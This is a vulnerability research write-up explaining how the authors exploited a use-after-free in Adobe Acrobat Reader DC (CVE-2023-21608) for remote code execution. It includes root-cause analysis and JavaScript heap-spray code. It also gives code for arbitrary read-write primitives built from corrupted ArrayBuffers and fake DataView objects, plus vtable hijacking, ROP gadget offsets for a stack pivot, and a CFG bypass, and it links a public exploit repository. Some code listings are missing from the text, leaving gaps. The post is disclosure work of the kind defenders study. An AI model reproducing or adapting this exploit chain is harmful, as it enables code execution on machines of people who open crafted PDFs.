Ashfaq Ansari, Krishnakant Patil
Overview
In the third part of the PDF Reader series, we are going to see how we exploited a use-after-free vulnerability in Adobe Acrobat Reader DC. The bug was found during our fuzzing campaign targeting popular PDF readers. We were able to successfully exploit this vulnerability to gain Remote Code Execution in the context of Adobe Acrobat Reader.
We have already shared 2 parts of the series, where we exploited Adobe Reader for Information Leaks and Foxit PDF Reader for Remote Code Execution (RCE). Both parts are linked below so that you can read more about them.
- Adobe Reader - XFA - ANSI-Unicode Confusion - Information Leak - CVE-2021-45067
- Foxit PDF Reader - Use after Free - Remote Code Execution Exploit - CVE-2022-28672
Zero Day Initiative (ZDI) acquired both the vulnerability and the exploit.
Advisory
CVE-2023-21608
Testbed
- OS edition: Windows 10 Pro 20H2 19042.804
- Product: Adobe Acrobat Reader DC 2022.003.20258
- Product URL: https://get.adobe.com/reader/otherversions/
Proof of Concept
The test case contains a static text field named testField embedded inside a PDF document.
5 0 obj
<<
/Type /Annot
/Subtype /Widget
/T (testField)
/FT /Tx
/Rect [0 0 0 0]
>>Below given is the relevant JavaScript part that triggers the bug.
Crash State
Enable page-heap for AcroRd32.exe and open the crash.pdf file with Acrobat Adobe Reader DC.
eax=04f6a0f0 ebx=00000000 ecx=420fefd0 edx=44e1cff8 esi=6921ef50 edi=420fefd0
eip=6c556b99 esp=04f6a0d0 ebp=04f6a0fc iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
AcroForm!CAgg::operator[](unsigned short)+0xe:
6c556b99 8b07 mov eax,dword ptr [edi] ds:002b:420fefd0=????????Note: All analysis and exploitation outlined in this post is done on Adobe Acrobat Reader DC version 2022.001.20085 x86.
Stack Trace
A quick verification using the !heap command reveals that this is a use-after-free vulnerability.
At this stage, with the above initial analysis in hand, we decided to deep dive into analyzing the root cause of this bug and see if we could exploit it to achieve RCE in Adobe Reader's sandbox process.
Root Cause Analysis
A couple of things to note in this PoC
- The bug occurs during the second call to the
resetForm resetForminvokes calculate events on all fields if aCalculatehandler is defined- In the
Calculatehandler, theeventobject'stargetproperty is overridden with a user-defined functiongetterFunc - Inside this
getterFuncfunction, thetextFontproperty of the field is redefined with the value of thedocobject - This causes a crash when the
event.richValue = thisassignment is executed in theCalculatehandler
The crash can be traced back through the call stack to the responsible call hierarchy.
The bug occurs when some form of value aggregation starts inside SetRichValueEventProp, which enumerates the assigned object this, which is an instance of the current doc object.
The properties and methods of doc are enumerated recursively using EScript!ESObjectEnum, which accepts a callback where enumerated property details are passed from EScript to AcroForm. The AcroForm!EScript_ESObjectEnum_CallbackProc callback is triggered for every property being enumerated.
When page-heap is enabled, the crash occurs in _DWORD *__thiscall std::map<unsigned short,CAgg>::lower_bound(TREE_VAL *this, _DWORD *a2, unsigned __int16 *a3) when dereferencing this pointer, which is a std::map object in the current context.
DWORD *__thiscall std::map<unsigned short,CAgg>::lower_bound(TREE_VAL *this, _DWORD *a2, unsigned __int16 *a3)
{
TREE_NODE *Myhead; // eax
TREE_NODE *Parent; // ecx
unsigned __int16 v5; // si
int v6; // eax
Myhead = this->_Myhead; // crash location - page-heaps enabled
Parent = this->_Myhead->_Parent;
...
}After checking for the caller of this function, it appears that the int __thiscall std::map<unsigned short,CAgg>::operator[](TREE_VAL *this, int a2, unsigned __int16 *pSomeID) function is responsible for inserting a value into the corresponding std::map.
The code above shows that a new CAgg allocation is created while inserting a value into the std::map. Testing with heap grooming and the .dvalloc trick revealed that the std::map<unsigned short,CAgg>::insert function also allows for arbitrary writes on the chosen address. By using heap grooming, it is possible to gain control of the corrupted std::map pointer used in this context, allowing for further exploitation.
By exploiting the arbitrary write, it is possible to corrupt the length of the ArrayBuffer and gain relative out-of-bounds read-write capabilities. This allows for relative data to be read from or written to memory locations outside of the bounds of the ArrayBuffer.
Further investigation into how the map was corrupted revealed that the AcroForm!CAgg::operator[](unsigned short) function was calling std::map<unsigned short,CAgg>::operator[] with this->map. When examining the CAgg object in the debugger, it was discovered that it had been freed and was now user-controlled. This opened up the possibility for further exploitation of the vulnerability.
While there were no obvious primitives available on the corrupted CAgg object, it was possible to read its type with this->type. The CAgg::operator[] function was called from EScript_ESObjectEnum_CallbackProc, which is triggered for each property being enumerated by EScript!ESEnumObject. This provided some insight into how the object was corrupted and could potentially be exploited.
In this current scenario, we have a problem with the pCagg object. This object has already been freed, but it is still being used in the callback function EScript_ESObjectEnum_CallbackProc where it's passed to the ESValToCAgg function.
Note: This function is recursive, so the problem repeats over and over.
Our analysis shows that the CAgg objects are allocated inside the std::map<unsigned short,CAgg>::operator[] function during each property enumeration when setting the richValue property. However, during the resetForm process, the event.target property is trapped using __defineGetter__. This function is called during the recursive properties enumeration of the doc object. When the target property is accessed, the getterFunc function is called, which redefines the field's textFont property as the doc object. This also sets it to be non-configurable and non-enumerable.
During the second resetForm, the same process is repeated, but when getterFunc is called again, it raises an exception because of the field.textFont property is now non-configurable. This causes a different path to be taken when accessing the event.richValue property, which frees all of the CAgg objects that have been constructed so far. The free code path is called while the object enumeration is still in progress, and when it finishes, it triggers the use of the freed CAgg object.
Above hypothesis can be verified using a debugger by setting up the following breakpoints in WinDbg.
The trace output result from the above breakpoints is provided below.
Inside the debugger, we can see the corrupted std::map object pData: d41d0fd0, which is part of the freed CAgg object that was allocated during the enumeration of the textFont property alloc: d41d0fb8.
When the free code path is taken, all objects and map objects are freed. The same pointer is later accessed when processing the richValue property enumeration, leading to a use-after-free condition.
Note: During the testing to control the use-after-free condition, we did not find any code paths that would allow us to reallocate the freed memory in a way that could be exploited.
However, we discovered that certain object sizes can cause Adobe Acrobat Reader to crash while dereferencing the sprayed pattern, giving us the possibility to exploit the bug for Remote Code Execution (RCE).
Heap Grooming
By grooming heap allocations with an object of size 68, we were able to control the crash. The crashing object size was initially found by brute forcing.
Note: The grooming was done before the UaF was triggered. We will come back to this later.
eax=04b7a854 ebx=04b7a8b4 ecx=42424141 edx=4e4e4d4d esi=6921ef50 edi=42424141
eip=6c3695af esp=04b7a838 ebp=04b7a838 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212
AcroForm!CAgg::operator[](unsigned short)+0x3:
6c3695af 8b01 mov eax,dword ptr [ecx] ds:002b:42424141=????????In the crashing function, we can see that the user-controlled value is being dereferenced.
The allocation source can be verified in WinDbg as shown below.
By further looking at what was causing the controlled crash as the heap-grooming before the bug trigger, we observed that the array of sprayed string objects is also used during aggregation when the resetForm is in progress.
Inside CAggToESVal when the object type is a string, the below code is triggered which creates a new string from CAgg.
One important detail to note here is the call to EScript!ESValSetString to create new string content from the CAgg string object (which are our sprayed string objects). ESValSetString calls sub_1003EBD2 to create a string with the given content, which is further responsible for allocating a heap buffer of the string length and copying the source string content into it.
In the above code, JS_malloc_Wrapper will reallocate the freed CAgg buffer when processing a large number of strings, allowing us to reallocate the buffer with user-controlled data. When this sprayed buffer is later used in the CAgg::* functions, it causes a crash while dereferencing user-controlled data.
SpiderMonkey Internals in EScript.API
Firefox's Spidermonkey is the JavaScript engine used inside Adobe Reader through EScript.API plugin for processing JavaScript embedded inside PDFs. To effectively exploit this bug, we need to understand how JavaScript objects are implemented inside Spidermonkey and their memory organization.
Spidermonkey uses the 64-bit representation to store JavaScript native jsval inside the memory.
- Double are stored in full 64-bit IEEE-754 value
- Other
jsvallike numbers, strings, objects, etc. uses 32-bit for type tagging and 32-bit for storing actual value (or object pointer)
ArrayBuffer
We will use ArrayBuffer for spraying user-controlled data at predictable addresses and corrupting the length with an arbitrarily large integer value to gain out-of-bounds read-write primitives. Let's look at how it is represented in memory.
ArrayBuffer implementation has 0x10 bytes header + content equal to the size specified.
- Length is stored at an offset of
0x4 - If a
TypedArrayis initialized then, at an offset of0x8you find theTypedArraypointer - Finally, you have the actual user-controlled data
In the EScript.api, the sub_10131A2C function is responsible for allocating an ArrayBuffer of the specified length. If the size of the ArrayBuffer is less than 0x68, an inline representation is used to store the data. Otherwise, a block of memory of the specified size is created and filled with zeros.
Array
var a = new Array();
a[0] = 0x41424142
a[1] = 0x55555555;
a[2] = "javascript";
a[3] = {};We will use Array for achieving addrOf (address of) primitive. Below given is the representation of the JavaScript array in memory.
sub_1004DBA9 in EScript.api is responsible for creating arrays and can be tracked while spraying arrays.
The contents of the array are organized in (tag, value) tuple in memory, where the tag is used to identify the type associated with the value.
e.g.
Number - ffffff81
String - ffffff85
Object - ffffff87When we have out-of-bounds access on the ArrayBuffer, we can spray a large JavaScript array just after ArrayBuffer and use the out-of-bounds primitive to read the address of any arbitrary JavaScript object.
We can see the way our string is represented in memory by dumping the memory of the above pointer.
Further, in exploitation, we will create fake strings with the help of ArrayBuffer and use one of the sprayed fake strings to read arbitrary memory contents, achieving temporary arbitrary read primitive.
Exploitation
Used .dvalloc to see if we have any controlled read-write crashes or a crash while calling arbitrary virtual function pointer.
We found a crash that leads to arbitrary-write on our controlled address
(*ecx) = some_32_valuewhereecxis user-controlled pointer.
Strategy
- Spray a lot of
ArrayBufferto get allocation at a predictable address like0x20000048 - Grom LFH with our specified pattern to corrupt the
ArrayBufferat a predictable address - Trigger the vulnerability to use the freed buffer and corrupt the
ArrayBufferlength - Use corrupted
ArrayBufferto create a fake string to achieve arbitrary read primitive - Use arbitrary read from fake string to create fake
DataViewto achieve arbitrary read-write primitives - Corrupt field's virtual table to hijack execution control
- Bypass CFG
- Execute shellcode
- Restore corrupted objects and recover cleanly
Spraying ArrayBuffer
var SPRAY = [];
for(var i=0; i<0x2000; i++) {
SPRAY[i] = new ArrayBuffer(0x10000-24);
const typedArray = new Uint32Array(SPRAY[i]);
typedArray[0] = 0x41424344;
typedArray[1] = 0x41424344;
}Using the above script we can have an ArrayBuffer allocated at a predictable address such as 0x20000058.
Locating ArrayBuffer
By using magic markers, we can locate the buffer in heap memory which helps to find the constructor which allocates the ArrayBuffer in Adobe Reader.
Note: Allocation ofArrayBufferhappens inEScript.apicode.
For example, when allocating an ArrayBuffer of size 0x1020, searching memory for the magic marker and identifying who allocated the memory can help us find the ArrayBuffer constructor.
Verifying the ArrayBuffer backing memory (array buffer chunk + header size (0x10)).
By using a WinDbg breakpoint on the constructor code, we can find the addresses where ArrayBuffer is being allocated.
bp Escript+0x131a4e ".printf \"[ArrayBuffer alloc] %p \\n\", eax; gc"Now, let's see how the actual ArrayBuffer spray looks like in the exploit.
ArrayBuffer allocation on predictable address 0x20000048 is successful
By using heap grooming with our predictable address pattern and triggering the vulnerability, we can see that the ArrayBuffer length is corrupted/modified.
The length of the ArrayBuffer is corrupted by a pointer value, allowing for relative out-of-bounds read-write on the heap.
Once the vulnerability is triggered, the corrupted ArrayBuffer can be located using the below-given code.
for (var i=0; i<bufs.length; i++)
{
if (bufs[i].byteLength != ALLOC_SIZE)
{
console.println("[+] corrupted array buffer found at " + i + " : length: " + bufs[i].byteLength + " : buf length: " + bufs.length);
...
}
}Out-of-bounds to Arbitrary Read-Write Primitives
Once out-of-bounds read-write primitives are achieved on the ArrayBuffer, the second JavaScript Array is used to create the addrOf primitive. To be able to read-write from Array, a set of Arrays of length similar to ArrayBuffer are sprayed so that the allocations of the Array land just after ArrayBuffer spray as shown below.
-------------------------------------------------------------------------------
| | | | | | | | | | |
|arrbuf_1|arrbuf_2|arrbuf_3|.........|arrbuf_n|...|array_1|array_2|...|array_n|
| | | | | | | | | | |
-------------------------------------------------------------------------------With ArrayBuffer out-of-bounds access, we can find the start of the first Array and use it to further create another set of primitives.
addrOf- leak address of any JavaScript object
poi- leak value at a given address (this initial form of
AARis required to create fullAAR/AAW) AAR- read the arbitrary value at a given address
AAW- write value at a given address
Spraying large Array
- We need to allocate a few large
Arrayjust after our sprayedArrayBuffer - Once we corrupt the length of the
ArrayBufferwe can locate thisArrayand corrupt the adjacentArrayfor arbitrary read-write primitives - However, the JavaScript
Arrayreallocations seem to be growing in a certain pattern when we tried to add large elements in the loop to theArray
for(var k = 0; k<N; k++) {
_arr_.push(0x41414141);
}- After some testing, we observed that the reallocation length can be partially controlled by allocating
Arraywith initial contents
// initial contents are ajusted after testing few iterations
// to be maximum enough to be allocated just after sprayed ArrayBuffer
var _arr_ = new Array(1, 2, 3, 4);Controlled Array Spraying
Arraywith initializer should start with the allocation of0x003f0- Further, elements initialization inside for loop should increase the allocation sizes using reallocs
- Increment of
Arraylength happens as:0x003f0 -> 0x007d0 -> 0x00f90 -> 0x01f10 -> 0x03e10 -> 0x07c10 -> 0x0f810 - Re-allocations with size
0x0f810should land theArrayallocations just after the lastArrayBufferfrom our spray - When we read out-of-bound from a corrupted
ArrayBuffer, we should be able to read the contents of the sprayedArray
The final Array allocation should look as given below.
Where 0db3c420 ffffff85 is targetStr and 0dda27c0 ffffff87 is targetDataView.
addrOf Primitive
The addrOf primitive allows us to leak the address of any JavaScript object by reading the address of the object stored in a sprayed Array using out-of-bounds primitives. The corruptedTypedArr is a typed array with a corrupted ArrayBuffer length, and arrStart is the index where the JavaScript Array is located from the start of the corrupted ArrayBuffer. The modified_arr is the JavaScript Array from the sprayed Arrays that we will use for corruption and address leakage.
function addrOf(obj)
{
modified_arr[0] = obj;
addr = corruptedTypedArr[arrStart+4];
return addr;
}Temporary Arbitrary Read Primitive
poi primitive allows us to read the value at an arbitrary address.
To achieve poi primitive, we need to perform a few steps:
- Allocate a string in global scope like
var targetStr = "Hello"; - Spray the above string object as an element in sprayed arrays
arrs[i][1] = targetStr; - Spray fake string structure inside sprayed
ArrayBuffer
uintArr[FAKE_STR_START] = 0x102; // type
uintArr[FAKE_STR_START+1] = arrBufPtr+0x40; // buffer- Once out-of-bounds primitives are achieved, we assign the fake string to the address of sprayed string object from array
uintArr[arrStart+6] = FAKE_STR;. - Now,
targetStrwhich was sprayed along withArraycan be confused with fake string. - Reading values from the given arbitrary address are achieved by setting
addrto the backing buffer pointer of the fake string and then normally reading thetargetStrobject of our modifiedArray. This will allow us to read values from arbitrary addresses.
function s2h(s) {
var n1 = s.charCodeAt(0)
var n2 = s.charCodeAt(1)
return ((n2<<16) | n1) >>> 0
}
function poi(addr)
{
// leak values at addr by setting it to string pointer
corruptedTypedArr[FAKE_STR_START+1] = addr;
val = s2h(modified_arr[1]);
return val;
}Arbitrary Read-Write Primitives
Once we achieve out-of-bounds read-write on the ArrayBuffer, we can use the addrOf and poi primitives to perform arbitrary reads. With these primitives, we can derive full arbitrary read-write primitives by using the JavaScript DataView object.
To create arbitrary read-write primitives using a DataView object, we can follow these steps:
- Create a
DataViewobject with a validArrayBufferand set an initial value for it:
var targetDV = new DataView(new ArrayBuffer(0x64));
targetDV.setUint32(0, 0x55555555, true);- Spray the
targetDVobject as an element in anArrayof sprayed Arrays:
for (var i=0; i<0x10; i++)
{
...
arrs[i][2] = targetDV;
...
}- Create a fake
DataViewobject by spraying anArrayBufferand setting a magic number value at the start of the spray.
uintArr[FAKE_DV_START] = 0x77777777;- Once out-of-bounds primitives are achieved, assign the fake
DataViewobject to the address of the sprayedDataViewobject.
uintArr[arrStart + 8] = FAKE_DV;- Clone the contents of the valid
DataViewobject into the fakeDataViewusing the previously constructed primitives.
var targetDVPtr = addrOf(targetDV);
for (var k=0; k<32; k++)
{
corruptedTypedArr[FAKE_DV_START + k] = poi(targetDVPtr + (k * 4));
}- Finally, to perform arbitrary read-write, set up the fake
DataViewobject's backingArrayBufferpointer and read/write from theDataViewobject.
function AAR(addr)
{
corruptedTypedArr[FAKE_DV_START + 20] = addr;
return modified_arr[2].getUint32(0, true);
}
function AAW(addr, value)
{
corruptedTypedArr[FAKE_DV_START + 20] = addr;
modified_arr[2].setUint32(0, value, true);
}Shellcode Execution
To execute shellcode, we use the arbitrary read-write (AAR/AAW) primitives to bypass ASLR and CFG.
The steps are as follows:
- Bypass
ASLRby leaking theAcroForm.apibase address from thefieldobject
var AcroFormApiBase = AAR(AAR(addrOf(testField) + 0x10) + 0x34) - 0x00293fe0- Leak the address of the field
vtable
var fieldVtblAddr = AAR(AAR(AAR(AAR(addrOf(testField) + 0x10) + 0x10) + 0xc) + 4)
var fieldVtbl = AAR(fieldVtblAddr)- Clone the vtable into the heap (cloning is necessary as we do not have the write permission on the vtable address). We clone it to our chosen heap address (picked from the
ArrayBufferspray) and make further modifications there.
for(var i=0; i < 32; i++) {
AAW(arrBufPtr + 0x100 + (i * 4), AAR(fieldVtbl + i * 4));
}- Perform stack pivoting into our controlled heap for shellcode execution. We prepare a fake stack on the heap with the necessary details as shown below:
AAW(arrBufPtr+0x100+0x48, AcroFormApiBase+0x6faa60); // CFG gadget = AcroForm!sub_20EFAA60;
AAW(arrBufPtr+0x100+0x30, AcroFormApiBase+0x256984); // 0x6b5e6984: mov esp, eax; dec ecx; ret;
AAW(arrBufPtr+0x100, AcroFormApiBase+0x1e646); // 0x6b3ae646: pop esp; ret;
AAW(arrBufPtr+0x100+4, arrBufPtr+0x300); // our pivoted stack
AAW(fieldVtblAddr, arrBufPtr+0x100); // field vtable- Set up ROP and execute the shellcode
- Finally, invoke the shellcode by calling the
defaultValueproperty on thetestFieldobject.
var ret = testField.defaultValue;Control Flow Guard (CFG) Bypass
Adobe Acrobat Reader has CFG enabled by default, so it is not possible to call the shellcode directly. Previous versions of exploits relied on using non-CFG modules within Adobe Reader to create the ROP chain, but newer versions have all modules CFG enabled.
One way to bypass this is to use the call sites that are not CFG instrumented. We found multiple non-CFG instrumented call sites that could be used to bypass CFG in Adobe Acrobat Reader. One of these functions is sub_20EFAA60, which allows us to call an address that we control by storing it in the ecx register.
This can be used to control the program's execution and execute the shellcode.
Context Restoration and Recovery
After running the shellcode, the Acrobat Reader crashes because the relevant context has not been restored. To make the Adobe Acrobat Reader continue running after exploitation, it is important to restore this context.
This involves several steps:
- Restoring
targetStrandtargetDVusing the fakestringandDataViewthat were created earlier - Restoring the original
vtablethat was hijacked for code execution - Fixing any corruption caused by the
ArrayBuffercorruption and other side effects of this corruption - Restoring the stack (this is done in the shellcode recovery part)
- Restoring
ESPto its default value (this is also done in the shellcode recovery part) - Backing up original values before corruption so they can be restored once the shellcode is executed (this is shown in the below snippet)
The below snippet shows how some of the original values are backed up before corruption so they can be restored once the shellcode has been executed.
Exploit Log
64-bit Exploitation
The CVE-2023-21608 bug also affected the 64-bit version of the Adobe Reader. We evaluated the possibility of exploiting this bug on the 64-bit version.
However, we stumbled upon 2 major issues:
- The heap spraying is no longer possible in 64-bit address space. Hence, we could no longer rely on
ArrayBufferspraying technique outlined above to allocate controlled data at predictable addresses. We now need a separate info-leak bug for further exploitation. - But finding an info-leak is not a difficult task. The core problem that makes this bug useless for 64-bit exploitation is that the sprayed strings are used as aggregation objects, where new strings are created from the sprayed string. While creating a new string the standard C null terminators are considered. We can't use any addresses which have two consecutive
NULLbytes in them. This will stop the string copy and we will never be able to re-allocate the freed memory with a controlled chunk that has the leakedArrayBufferaddress in it. The bug would no longer be effective and reproducible. This limits us from the possibility of exploiting this bug on the 64-bit version.
Exploit Repository
https://github.com/hacksysteam/CVE-2023-21608
Demo Video
Further Reading
- CVE-2020-9715: Exploiting the Adobe ESObject Use-After-Free Vulnerability
- CVE-2020-9715: Exploiting a Use-After-Free in Adobe Reader
- tianfu Adobe exploit code
- tianfu Writeup
- Analysis of a use-after-free Vulnerability in Adobe Acrobat Reader DC - CVE-2020-9715
- Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC - CVE-2021-39863
- Adobe, Me and an Arbitrary Free :: Analyzing the CVE-2018-4990 Zero-Day Exploit
- CVE-2020-9715 Exploit Code
- CFG Internals
- Javascript Internals
- SpiderMonkey GC Source